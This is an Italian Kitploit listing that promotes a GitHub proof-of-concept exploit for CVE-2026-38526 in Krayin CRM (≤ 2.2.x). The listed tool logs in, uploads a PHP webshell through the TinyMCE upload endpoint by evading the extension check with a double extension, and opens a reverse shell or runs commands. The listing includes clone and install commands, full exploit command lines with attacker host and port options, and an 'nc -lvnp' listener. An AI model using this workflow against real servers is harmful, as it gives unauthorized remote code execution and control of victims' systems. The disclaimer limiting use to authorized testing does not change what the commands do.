Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-38526-POC — Prova di concetto di CVE-2026-38526 in Krayin CRM <= v2.2.x. Caricamento arbitrario di file che porta all'esecuzione remota di codice. | Kitploit
Strumenti/GitHubGitHub/pawpic/cve-2026-38526-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubpawpic/cve-2026-38526-poc

CVE-2026-38526-POC

Prova di concetto di CVE-2026-38526 in Krayin CRM <= v2.2.x. Caricamento arbitrario di file che porta all'esecuzione remota di codice.

Vedi Repository
22 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-38526 - Exploit RCE per Krayin CRM

Krayin CRM (≤ 2.2.x) - Caricamento file senza restrizioni che porta all'esecuzione remota di codice.

Questo PoC sfrutta l'endpoint vulnerabile di upload di TinyMCE (/admin/tinymce/upload) per caricare una webshell PHP e ottenere l'esecuzione di comandi sul server.


Caratteristiche

  • Accesso automatico completo con gestione del token CSRF
  • Elude le restrizioni di upload usando la doppia estensione
  • Supporta reverse shell ed esecuzione di singoli comandi
  • Aggiornamento affidabile del token CSRF di Laravel
  • Pulito e facile da usare

Download

root@kitploit:~
git clone https://github.com/pawpic/CVE-2026-38526-POC

Requisiti

root@kitploit:~
pip3 install requests beautifulsoup4

Utilizzo

  1. Reverse Shell (Predefinita e consigliata)
root@kitploit:~
python3 exploit.py \ -u http://example.com \ -e [email protected] \ -p "example_pass" \ --lhost YOUR_IP \ --lport 4444
  1. Comando singolo
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  -c "whoami"

Opzioni

ArgomentoDescrizioneObbligatorio
-u, --urlURL di base del targetSì
-e, --emailEmail di accessoSì
-p, --passwordPassword di accessoSì
-c, --cmdEsegui un singolo comandoNo
--lhostIl tuo IP per la reverse shellSì (se non si usa --cmd)
--lportPorta di ascoltoNo (predefinita: 4444)

Esempio di flusso di lavoro

Avvia listener:

root@kitploit:~
nc -lvnp 4444

Esegui l'exploit:

root@kitploit:~
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR

Dichiarazione di non responsabilità

Questo exploit è destinato esclusivamente a scopi educativi e a test di penetrazione autorizzati. L'uso non autorizzato contro sistemi per i quali non si dispone di esplicita autorizzazione al test è illegale.

Versioni interessate

Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526


Autore: pawpic Data: 2026

Scarica lo strumento